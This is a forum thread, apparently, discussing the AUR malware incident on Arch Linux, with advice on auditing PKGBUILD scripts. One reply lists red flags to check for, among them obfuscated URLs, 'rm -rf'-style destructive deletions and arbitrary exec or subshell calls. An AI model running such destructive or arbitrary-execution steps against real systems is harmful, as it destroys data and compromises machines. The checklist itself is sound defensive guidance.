Honestly I take no issue with the malware attack. I find it more offensive that many publications write it like it’s the end of Arch. Like bro, AUR is NOT what I’d recommend to beginners to get their packages from. Some of the obscure packages include browser extension. Like, why would you install an extension from the AUR instead of the browser extension marketplace? This is why easy and braindead AUR helpers need to die. It encourages bad practice
The question here is why the f’ didn’t they shut down AUR packages takeover procedure? It makes no sense facing an attack of such a large scale.
oh fuck
What is even the goal here? It’s just such a weirdly specific target. You could easil hit more people by supply chain attacks. Feels like some butthurt hacker wants to get their revenge on just Arch in general. I want to start a Manjaro-Takeover conspieacy theory rn
It seems like a continuation from the DDOS attacks that still happen from time to time. If I was going down the conspiracy rabbit hole, I’d think some group is trying to keep linux in the press with bad/scary news to drive away growing interest and arch seems like the easiest target atm.
As a new arch user how do I check PKGBUILD and install script changes? And what am I looking for out of the ordinary?
Feel free to point me to a wiki page if possible
Nevermind I just searched pkgbuild
Using the AUR largely expects users to understand the basics of shell/BASH scripts, which is what a PKGBUILD is. The most obvious source to check is what URL(s) the PKGBUILD is pulling in for a package’s source(s). Are these URLs sourced from official or otherwise trusted sources for the application or component (such as from the app author’s download site or their git forge)? Does the PKGBUILD make any claims of what is being downloaded and does the target URL’s contents match that? If either of these checks fail, it’s best to avoid that package.
Additionally, does the PKGBUILD attempt to do things like obfuscate data such as URLs or tokens for downloading? Does it attempt to recklessly delete or modify files/directories (rm -rf, other recursive functions)? Does the PKGBUILD make use of any arbitrary execution statements such as exec or spawning subshells? If any of these check true, the package should seriously be revised before attempting to install it. System-level software installs on Linux systems should never be complicated enough to need fancy execution techniques nor reckless file management.
Thank you I wasn’t expecting such a deep answer the wiki was kinda confusing cuz its dry
If you are concerned with security, you can install postmaster or any other firewall force block all the internet connection and deny all the connections and then manually start allowing apps and process access to internet.
It’s an annoying process. It takes a lot of time to set up, but once it gets going, you will be mostly secure from this type of attack.
So, sort of security over convenience.
I would add using as much as possible flatpak, and only using aur in special circumsrances, also using selinux if possible.
